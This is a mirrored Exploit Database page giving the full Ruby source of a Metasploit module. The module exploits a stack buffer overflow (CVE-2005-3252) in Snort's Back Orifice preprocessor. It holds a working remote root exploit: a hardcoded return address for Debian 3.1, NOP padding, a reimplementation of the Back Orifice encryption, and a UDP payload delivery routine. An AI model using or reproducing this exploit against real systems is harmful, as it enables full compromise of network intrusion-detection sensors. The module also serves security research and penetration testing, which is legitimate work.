Snort Back Orifice – Pre-Preprocessor Remote (Metasploit)

• Exploit Database
• 112 阅读

• 作者： Metasploit
  日期： 2010-07-03
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/16834/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109

  ## # $Id: snortbopre.rb 9669 2010-07-03 03:13:45Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking   include Msf::Exploit::Remote::Udp   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Snort Back Orifice Pre-Preprocessor Remote Exploit&apos;, &apos;Description&apos;=> %q{ This module exploits a stack buffer overflow in the Back Orifice pre-processor module included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could be used to completely compromise a Snort sensor, and would typically gain an attacker full root or administrative privileges. }, &apos;Author&apos; => &apos;KaiJern Lau <xwings [at] mysec.org>&apos;, &apos;License&apos;=> BSD_LICENSE, &apos;Version&apos;=> &apos;$Revision: 9669 $&apos;, &apos;References&apos; => [ [&apos;CVE&apos;, &apos;2005-3252&apos;], [&apos;OSVDB&apos;, &apos;20034&apos;], [&apos;BID&apos;, &apos;15131&apos;], [&apos;URL&apos;,&apos;http://xforce.iss.net/xforce/alerts/id/207&apos;] , ], &apos;Payload&apos;=> { &apos;Space&apos;=> 1073, #ret : 1069 &apos;BadChars&apos; => "\x00", }, &apos;Targets&apos;=> [ # Target 0: Debian 3.1 Sarge [ &apos;Debian 3.1 Sarge&apos;, { &apos;Platform&apos; => &apos;linux&apos;, &apos;Ret&apos;=> 0xbffff350 } ], ], &apos;DefaultTarget&apos; => 0, &apos;DisclosureDate&apos; => &apos;Oct 18 2005&apos;))   # Configure the default port to be 9080 register_options( [ Opt::RPORT(9080), ], self.class) end   def msrand(seed) @holdrand = 31337 end   def mrand() return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff) end   def bocrypt(takepayload)   @arrpayload = (takepayload.split(//))   encpayload = "" @holdrand=0 msrand(0)   @arrpayload.each do |c| encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr end   return encpayload end     def exploit connect_udp   boheader = "*!*QWTY?"+ [1096].pack("V")+ # Length ,thanx Russell Sanford "\xed\xac\xef\x0d"+ # ID "\x01"# PING   filler = make_nops(1069 -(boheader.length + payload.encode.length))   udp_sock.write( bocrypt(boheader+payload.encode+filler+[target.ret].pack(&apos;V&apos;)) )   handler disconnect_udp end   end